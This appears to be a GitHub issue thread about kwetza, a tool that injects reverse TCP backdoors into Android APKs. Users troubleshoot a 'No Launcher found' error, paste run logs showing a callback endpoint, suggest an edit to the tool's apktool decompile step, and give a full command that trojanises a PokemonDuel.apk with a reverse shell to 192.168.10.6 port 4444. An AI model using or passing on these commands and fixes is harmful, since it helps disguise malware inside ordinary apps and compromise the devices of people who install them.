kwetza icon indicating copy to clipboard operation
kwetza copied to clipboard

No Launcher found, please specify a target class

Open bmont434 opened this issue 7 years ago • 5 comments

No Launcher found, please specify a target class

bmont434 avatar Nov 23 '17 18:11 bmont434

what is "NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS" in kweza

saeid5097 avatar Dec 25 '17 19:12 saeid5097

I have the same error

[] DECOMPILING TARGET APK [+] ENDPOINT IP: 0.tcp.xxxxx.io [+] ENDPOINT PORT: 11XXX [+] APKTOOL DECOMPILED SUCCESS [] BYTING TCP COMMS [*] ANALYZING ANDROID MANIFEST [DEBUG] Attempting to find MAIN [+] NO LAUNCHER FOUND, PLEASE SPECIFY A TARGET CLASS root@xxxxxxxx:~/kwetza-master#

timpl23 avatar Jun 05 '18 21:06 timpl23

Open kwetza.py script, edit: #NOW WE NEED TO DECOMPILE THE APPLICATION command = ["apktool", "d", ""+cwd+"/"+sys.argv[1]] p = subprocess.Popen(command, stdout=subprocess.PIPE) result = p.communicate()[0] (remove option -f and -r parameters)

even499891161 avatar Sep 25 '18 13:09 even499891161

How to change permission

yotonz avatar Sep 26 '18 14:09 yotonz

add AssistActivity python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

WinMore avatar Oct 26 '18 02:10 WinMore